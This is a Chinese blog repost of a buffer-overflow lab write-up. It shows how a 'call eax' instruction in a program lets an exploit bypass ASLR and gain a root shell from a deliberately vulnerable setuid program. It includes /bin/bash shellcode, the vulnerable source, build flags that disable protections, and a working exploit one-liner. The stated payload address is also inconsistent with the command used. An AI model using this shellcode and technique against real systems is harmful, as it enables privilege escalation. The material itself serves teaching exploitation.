缓冲区溢出漏洞(2)

最新推荐文章于 2022-09-26 22:08:55 发布
最新推荐文章于 2022-09-26 22:08:55 发布
阅读量205 收藏
点赞数 1
文章标签: 操作系统
原文链接:http://www.cnblogs.com/genius-sen/p/8311508.html
版权

通过"call eax"绕过ASLR

实验原理

前一个缓冲区溢出漏洞实验shellcode的地址采用的静态地址,但是现在的Ubuntu和其他一些Linux系统中,使用地址空间随机化(ASLR)来随机堆(heap)和栈(stack)的初始地址,采用静态地址攻击显得有很大的不足。一种经典的绕过ASLR的方法就是通过程序自身存在的"jmp 寄存器"指令,动态跳转到shellcode,即使程序每次加载的地址不一样,但程序指令间的相对运行不会变。本实验是通过程序本身存在的“call eax”(类似jmp eax)指令跳转到shellcode。

实验环境:

实验楼环境(Ubuntu linux 64位)

实验步骤

1.配置环境

本次实验是在32位环境中完成的,而实验楼ubuntu是64位,所以先下载安装32位的库。

sudo apt-get update
sudo apt-get install lib32z1 libc6-dev-i386
sudo apt-get install lib32readline-gplv2-dev

通过linux32命令进入32位linux环境。
1249712-20180118164459521-2122631636.png
打开ASLR:
1249712-20180118164546474-1514148012.png

2.shellcode

在前一次实验已经描述过什么是shellcode和它的作用。下面直接贴出shellcode的C版本代码:

#include <stdio.h> 
int main(int argc, char **argv) { 
    char *name[2]; 
    name[0] = "/bin/bash"; 
    name[1] = NULL; 
    execve(name[0], name, NULL); 
    return 0; 
}

shellcode怎么来的: shellcode是将上面C程序对应的汇编代码通过objdump获取其二进制代码得到的。
汇编版本:

xor %edx,%edx;\
push %edx;\
push $0x68732f2f;\
push $0x6e69622f;\
mov %esp,%ebx;\
push %edx;\
push %ebx;\
mov %esp,%ecx;\
xor %eax,%eax;\
movb $0x0b,%al;int $0x80;\

二进制代码:

\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"
3.漏洞程序
/*
    badpro.c
*/
#include <stdio.h>    
#include <string.h>    
void badfunc(char *input) {    
    char buffer[512];    
    strcpy(buffer, input);    
}    
int main(int argc, char **argv) {    
    badfunc(argv[1]);    
    return 0;    
}

上面程序完成的功能是:将main函数的第一个参数(字符串)复制到buffer中。
用下面的命令进行编译链接生成可执行的badpro:

gcc -Wall -g -o badpro badpro.c -z execstack -m32 -fno-stack-protector

给该程序加上root权限,这样攻击成功后就会获得其root权限:

sudo chown root:root badpro
sudo chmod a+s badpro
4.漏洞利用

通过objdump -d badpro | grep *%eax命令查找程序中是否存在call eax或者jmp eax这样的指令。其中“*%eax”是在寄存器前面加星号,代表这是一个绝对调用或者跳转,也就是该命令是对一个绝对地址进行操作,也正是由于这样指令的存在,才使得这种攻击成为可能。
1249712-20180118165930084-1605636602.png
选择0x08048386这个地址,作为跳板,得到最终的exploit的内容:ShellCode(N) + A(524-N) + \xdf\x83\x04\x08,这里事先生成的shellcode为25字节,因此填充了499个A。
执行如下命令:

./badpro $(perl -e 'printf "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80" . "A"x499 ."\x86\x83\x04\x08"')
/*
    perl -e 是perl在命令行中执行的命令;printf是将后面紧跟的字符串写入标准输出流;“A”x499是产生499个A。
*/

1249712-20180118172444068-391824480.png
从上图可以看出,我们已经获得了root权限。成功!

转载于:https://www.cnblogs.com/genius-sen/p/8311508.html

weixin_33905756
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
EAX寄存器(关键跳,关键CALL)
song_10的博客
11-04 1万+
OD动态调试过程中,寄存器窗口是需要时常关注的! EAX寄存器:累加器,在乘法和除法指令中被自动调用;在win32中,一般用在函数的返回值中。 CALL:过程调用指令  格式: CALL OPRD  功能: 过程调用指令(说明: 1. 其中OPRD为过程的目的地址. 2. 过程调用可分为段内调用和段间调用两种.寻址方式也可以分为直接寻址和间接寻址两种. 3. 本指令不影响标志位.) 32位 ...
Example 2
qq_39249347的博客
08-10 338
运行 运行要破解的程序。 消息框显示两条信息: 删除所有Nags 查找registration code 蓝色文字要求使用SmartCheck注册。 分析 第一个目标使去掉Nag消息框,要去除消息框,只要操作调用消息框的函数部分即可,Visual Basic中调用消息框的函数为MSVBVM50.rtcMsgBox。 点击鼠标右键,Search for - All intermodular calls命令,将会列出程序中调用的API目录,选择Destination栏目,根据函数名称排
滴水逆向笔记(八)
m0_51295934的博客
01-26 468
​ 一.JMP指令:修改EIP的值 JMP EAX=MOV EIP,EAX(虽然这条指令无法执行) 例子 此时我们执行JMP,EAX 二.CALL指令 CALL EAX=PUSH 地址B && MOV EIP,EAX 例子 ​ 圈起来的那部分是我们下的断点,点击编号然后按F2就会有这种效果,接着我们执行CALL 0x4012C5 此时可以看到ESP和EIP都改变了 三.RET指令 ​例子: 之后我们执行RET 可以看到此时它跳回了0x401285,而且EIP的值变为了0x401285,E
009 数据结构逆向—数组(困难版)
鬼手的博客
04-25 1569
文章目录前言数组逆向通过人物血量查找人物属性调call取对象call内追局部变量逆向加密数组下标分析人物属性总结 前言 通过之前的分析,我们已经对数组结构有了一个简单的了解,这次就用幻想神域这个游戏来更加深入学习数组。 数组逆向 通过人物血量查找人物属性 以人物血量为切入点,我们要找到所有的人物属性。 首先搜索当前人物血量 接着通过换装备的方式修改人物血量,最后剩下两个结果,一个是当前血量,一...
缓冲区溢出之总结
九层台
08-27 819
还有最后一个实验没写,觉得没必要了,在这里随便说一下就行了。上代码: char* getpath(){char buffer[64];unsigned int ret;printf("input path please:");fflush(stdout);gets(buffer);ret = __builtin_return_address(0);if ((ret & 0xb0000000) ==
缓冲区溢出漏洞实验报告
10-15
**缓冲区溢出漏洞实验报告** 缓冲区溢出是一种常见的软件安全漏洞,主要发生在程序处理数据时,未能正确检查输入数据的长度,导致超出预定内存分配的边界,从而覆盖相邻内存区域的数据。这种漏洞常常被恶意攻击者...
PHP5.0 TIDY_PARSE_FILE缓冲区溢出漏洞的解决方案
12-19
总的来说,理解和防范缓冲区溢出漏洞对于任何IT专业人员来说都至关重要,因为这类漏洞经常被用于发动严重的攻击。通过深入分析漏洞的原理、复现过程和解决方案,我们可以提高系统的安全性,避免成为恶意攻击的目标。
缓冲区溢出漏洞实验报告(附带程序源码和被攻击程序)
04-18
3.缓冲区溢出演示 4.溢出攻击结果与危害 5.防御手段 适合人群: 具备一定编程基础,作业时间不够的学生,对缓冲区溢出原理不了解的初学者 环境: IDA pro7.6, vc++ ,x32dbg。 阅读建议: 有一点 x32dbg逆向工具...
缓冲区溢出漏洞研究与进展.pdf
10-29
缓冲区溢出漏洞缓冲区溢出漏洞是软件安全中的一个重要问题,它源于编程时对内存管理的不当处理,特别是在使用C/C++等低级语言编写程序时,由于缺乏类型安全检查,容易出现此类问题。缓冲区溢出通常发生在程序...
论文研究-CBOC:一个C语言缓冲区溢出漏洞有效检测工具 .pdf
08-20
CBOC:一个C语言缓冲区溢出漏洞有效检测工具,陈石坤,李舟军,冲区溢出是C程序中很多安全问题的根源。本文给出一个C语言缓冲区溢出漏洞的有效检测工具CBOC(C Buffer Overflow Checker)。该工具基于符��
linux缓冲区溢出漏洞攻击文件
10-29
linux 缓冲区溢出 漏洞攻击 获取root权限 shell
写远程缓冲区溢出漏洞利用程序
08-03
怎样写远程缓冲区溢出漏洞利用程序 ? 在此,我们假设有一个有漏洞的服务器程序(vulnerable.c). 然后写一个 exploit 来利用该漏洞,这样将能得到一个远程 shell。
缓冲区溢出漏洞的讲解与演示
05-07
缓冲器溢出漏洞,是一种在软件中最易发生的漏洞。它发生的原理是,由于软件在处理用户数据时使用了不限边界的拷贝,导致程序内部一些关键的数据被覆盖,引发安全问题,严重的缓冲区溢出漏洞会使得程序被利用进行木马或病毒安装。
C++反汇编 剖析虚函数表的实现原理(下)
ylh的博客
09-26 769
反汇编技术,逐步跟踪分析虚函数表的存在原因,实现原理,虚函数表是什么?只要包含虚函数的类就会有一个虚函数表,当这个类是基类时,它的派生类也会有相应的虚函数表。当一个类有多个对象的时候,这些对象共享一个虚函数表。
c语言汇编call的参数,内嵌汇编—第7节:参数、局部变量、CALL原理
weixin_30151653的博客
05-18 1225
内嵌汇编—第7节:参数、局部变量、CALL原理小风群:300275325女神群:372452500(安卓,ISO,PC)全包揽,女神小敏期待你的加入哦。这一节可能是大家最想明白的部分,想当初我为了了解这部分内容学了整个8086汇编,然而8086汇编中却没有说在WIN32环境中CALL的过程。或者是说在当前C语言流行时下,大部分软件都是C编写的,C编译器是如何处理子程序实现“小黑盒”的。下面请大家看...
c语言compile是什么意思英语,什么c代码编译成`call *%eax`之类的东西?(What c code would compile to something like `call *%eax...
weixin_42349135的博客
05-25 473
什么c代码编译成`call *%eax`之类的东西?(What c code would compile to something like `call *%eax`?)我正在使用c和汇编,我在一些地方看到过call *%eax 。 我想写一个小的c程序,可以编译成这样的东西,但我卡住了。我正在考虑编写一些汇编代码,就像在这个问题中一样: x86汇编指令:call * Reg仅在我的情况下使用AT...
mov eax,0x4e1fb3b call eax
weixin_41454036的博客
09-07 595
MOV EAX,1 是将立即数1移入EAX中,执行该指令后 EAX = 1 MOV EAX,[1] 是将内存地址1内的一个DWORD(4字节)的数据移入EAX中,执行完该指令后 EAX = 内存地址1处的DWORD数据 MOV EAX,0x4e1fb3b 是将立即数1移入EAX中,执行该指令后 EAX = 1 MOV EAX,[0x4e1fb3b] 是将内存地址1内的一个DWORD(4字节)的数据移入EAX中,执行完该指令后 EAX = 内存地址1处的DWORD数据 ...
CALL入门篇一:CALL的本质
fengfengfengmy的专栏
05-10 8561
CALL入门篇一:CALL的本质*所谓的call,其实本质上来说就是一条汇编指令. *只要找到了关键代码的地址,传入适当参数,就可以借用游戏中已有功能来完成内挂的功能。 当程序被编译以后,便不会存在任何函数,存在的只是0和1.所以我们调用也只是这段机器码而已. 网上找CALL的教程很多,但是却是从一个游戏的某一个功能入手,比如说完美的打坐
CALL是如何炼成的 之一:理论篇
u010488395的专栏
05-04 1175
遇到一个CALL应该如何写?    这个是写一个内挂不可避免的问题.刚初学的朋友可能会不知道如何入手.想起刚学这方面的时候,绕过很多 弯路,现在把一些经验写出来给大家参考参考吧,不是很高深的东西,但我觉得对某些人很有帮助.    CALL是什么?    CALL是汇编中的一个指令,CPU执行这条指令会执行2个动作 一:压入EIP入栈 二:跳转到后面的地 址.  跟RET
openssl缓冲区溢出漏洞
最新发布
05-19
OpenSSL缓冲区溢出漏洞是一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或导致拒绝服务攻击。 该漏洞的原因是在OpenSSL库中,有一些函数没有正确地检查输入缓冲区的大小,导致缓冲区溢出。攻击者可以利用这个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值